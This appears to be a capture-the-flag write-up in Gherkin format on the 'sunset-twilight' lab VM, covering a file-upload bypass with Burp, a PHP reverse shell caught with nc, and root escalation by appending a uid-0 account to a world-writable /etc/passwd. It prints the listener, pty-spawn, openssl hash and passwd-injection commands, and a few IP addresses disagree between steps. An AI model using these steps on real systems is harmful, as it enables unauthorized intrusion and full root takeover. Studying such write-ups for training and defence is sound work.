## Version 1.4.1
## language: en

Feature:
  TOE:
    sunset-twiligth
  Category:
    File Upload
  Location:
    http://192.168.0.6:80/gallery
  CWE:
    CWE-434: Unrestricted Upload of File with Dangerous Type
  Rule:
    REQ.043: https://fluidattacks.com/web/rules/043/
    REQ.040: The system must validate that the format (structure)
     of the files corresponds to its extension.
    REQ.041: The system must validate that the content of the files
     transferred to the same system is free of malicious code.
  Goal:
    Get shell and privilege escalation
  Recommendation:
    Add type checks to restrict the uploadable file types

  Background:
  Hacker Software:
    | <Software name>               | <Version> |
    | Kali Linux                    |  2020.3   |
    | Nmap                          |  7.80     |
    | VirtualBox                    |  6.1      |
    | Firefox                       |  79.0     |
    | dirb                          |  2.22     |
    | Burp Suite Community Edition  |  2020.6   |
    | OpenSSL                       |  1.1.1.g  |

  TOE information:
    Given a file with the .OVA file extension is delivered
    Then I run it on Virtualbox
    And I realize that a user is required to log in [evidences](01.png)
    Then I proceed to make a scan with nmap on my network with the command
    """
    Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-04 16:09 EST
    Nmap scan report for csp1.zte.com.cn (192.168.0.1)
    Host is up (0.0023s latency).
    Nmap scan report for 192.168.0.3 (192.168.0.3)
    Host is up (0.0024s latency).
    Nmap scan report for 192.168.0.4 (192.168.0.4)
    Host is up (0.10s latency).
    Nmap scan report for twilight (192.168.0.6)
    Host is up (0.00051s latency).
    Nmap scan report for kali (192.168.0.9)
    Host is up (0.00028s latency).
    Nmap done: 256 IP addresses (5 hosts up) scanned in 6.59 seconds
    """
    Then I determined that the ip of the machine is 192.168.0.6
    """
    $ sudo nmap -sV -sS 192.168.0.14
    Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-04 16:10 EST
    Nmap scan report for twilight (192.168.0.6)
    Host is up (0.00030s latency).
    Not shown: 992 closed ports
    PORT     STATE SERVICE     VERSION
    22/tcp   open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    25/tcp   open  smtp        Exim smtpd 4.92
    80/tcp   open  http        Apache httpd 2.4.38 ((Debian))
    139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    2121/tcp open  ftp         pyftpdlib 1.5.6
    3306/tcp open  mysql       MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
    8080/tcp open  http        PHP cli server 5.5 or later
    MAC Address: 08:00:27:AC:1D:3F (Oracle VirtualBox virtual NIC)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at
    Nmap done: 1 IP address (1 host up) scanned in 12.33 seconds
    """

  Scenario: Normal use case
    Given I access the site http://192.168.0.6:80/
    And the Rashomon IPS homepage is displayed [evidences](02.png)

  Scenario: Static detection
    Given I don't have access to the source code
    Then I can't do static detection

  Scenario: Dynamic detection
    Given the website does not show any vulnerabilities with the naked eye
    Then I proceeded to parse with dirb the directories on the server
    """
    -----------------
    DIRB v2.22
    By The Dark Raver
    -----------------

    START_TIME: Mon Jan  4 16:52:14 2021
    URL_BASE: http://192.168.0.6/
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

    -----------------

    GENERATED WORDS: 4612
    ---- Scanning URL: http://192.168.0.6/ ----
    ==> DIRECTORY: http://192.168.0.6/gallery/
    + http://192.168.0.6/index.php (CODE:200|SIZE:228)
    ==> DIRECTORY: http://192.168.0.6/javascript/
    + http://192.168.0.6/server-status (CODE:403|SIZE:276)
    --- Entering directory: http://192.168.0.6/gallery/ ----
    + http://192.168.0.6/gallery/index.php (CODE:200|SIZE:1237)
    ==> DIRECTORY: http://192.168.0.6/gallery/original/
    ==> DIRECTORY: http://192.168.0.6/gallery/style/
    ==> DIRECTORY: http://192.168.0.6/gallery/thumbnail/

    ---- Entering directory: http://192.168.0.6/javascript/ ----
    ==> DIRECTORY: http://192.168.0.6/javascript/jquery/

    ---- Entering directory: http://192.168.0.6/gallery/original/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

    ---- Entering directory: http://192.168.0.6/gallery/style/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

    ---- Entering directory: http://192.168.0.6/gallery/thumbnail/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

    ---- Entering directory: http://192.168.0.6/javascript/jquery/ ----
    + http://192.168.0.6/javascript/jquery/jquery (CODE:200|SIZE:271809)

    -----------------
    END_TIME: Mon Jan  4 16:52:26 2021
    DOWNLOADED: 18448 - FOUND: 4
    """
    Given the results I access the /gallery path [evidences](03.png)
    Then I try to load the file from revshell.php [evidences](04.png)
    And shows warning of allowed files
    """
    Only jpeg images are allowed!
    """
    Then I use the burpsuite and modify the POST request [evidences](05.png)
    And load the revshell.php file [evidences](06.png)

  Scenario: Exploitation
    Given the site is vulnerable to unrestricted file upload
    Then to use nc to listen to port 1234
    """
    nc -lvp 1234

    listening on [any] 1234 ...
    connect to [192.168.0.9] from twilight [192.168.0.8] 42350
    id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    """
    Given the vulnerability it is used Interactive Terminal Spawned via Python
    """
    python3 -c 'import pty;pty.spawn("/bin/bash")'
    www-data@twilight:/var/www/html/gallery/original$ cd ..
    www-data@twilight:/var/www/html/gallery$ cd ..
    www-data@twilight:/var/www/html$ ls -ls /etc/passwd
    ls -ls /etc/passwd
    4 -rwxrwxrwx 1 root root 2079 Jan  5 15:05 /etc/passwd
    """
    Given the permissions of the /etc/passwd path
    Then the file will be copied and downloaded from the attacking machine
    """
    www-data@twilight:/var/www/html$ ls -ls
    ls -ls
    total 16
    4 -rw-r--r-- 1 root     root      152 Jul 15 21:58 current.php
    4 drwsr-xr-x 6 www-data www-data 4096 Jan  5 12:27 gallery
    4 -rw-r--r-- 1 root     root      228 Jul 15 22:03 index.php
    4 -rw-r--r-- 1 root     root       58 Jul 15 22:03 lang.php
    www-data@twilight:/var/www/html$ cp /etc/passwd /var/www/html/gallery
    cp /etc/passwd /var/www/html/gallery

    kali@kali:~/Downloads$ wget http://192.168.0.6/gallery/passwd
    """
    Given the download of the password file
    Then I hash it using openssl and add the password to the file
    """
    kali@kali:~/Downloads$ openssl passwd -1 -salt user password
    $1$user$Wz5uEtHgU0fEztAejphdY/
    kali@kali:~/Downloads$ echo "miyyer:$1$user$Wz5uEtHgU0fEztAejphdY/:0:0:
    root:/root:/bin/bash" >> passwd
    """
    Given the new user the file is sent to the target machine
    And copied to the /etc/passwd path
    """
    www-data@twilight:/tmp$ wget http://192.168.0.6/passwd
    wget http://192.168.0.9/passwd
    --2021-01-06 09:04:43--  http://192.168.0.6/passwd
    Connecting to 192.168.0.9:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 1657 (1.6K)
    Saving to: ‘passwd’

    passwd              100%[===================>]   1.62K  --.-KB/s    in 0s

    2021-01-06 09:04:43 (179 MB/s) - ‘passwd’ saved [1657/1657]

    www-data@twilight:/tmp$ ls
    ls
    passwd
    www-data@twilight:/tmp$ cp passwd /etc/passwd
    cp passwd /etc/passwd
    www-data@twilight:/tmp$ su miyyer
    su miyyer
    Password: password

    root@twilight:/tmp# id
    uid=0(root) gid=0(root) groups=0(root)
    """
    Given the new root permissions
    Then I can read the flag [evidences](07.png)

  Scenario: Remediation
    Given The website is vulnerable loaded files
    When The website is upload a file
    Then The file extensions must be verified

  Scenario: Scoring
   Severity scoring according to CVSSv3 standard
   Base: Attributes that are constants over time and organizations
     10/10 (high) - AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
   Temporal: Attributes that measure the exploit's popularity and fixability
     7/10 (high) - E:H/RL:O/RC:C
   Environmental: Unique and relevant attributes to a specific user environment
     7.8/10 (High) - CR:H/IR:H/AR:L

  Scenario: Correlations
    No correlations have been found to this date 2021-01-06
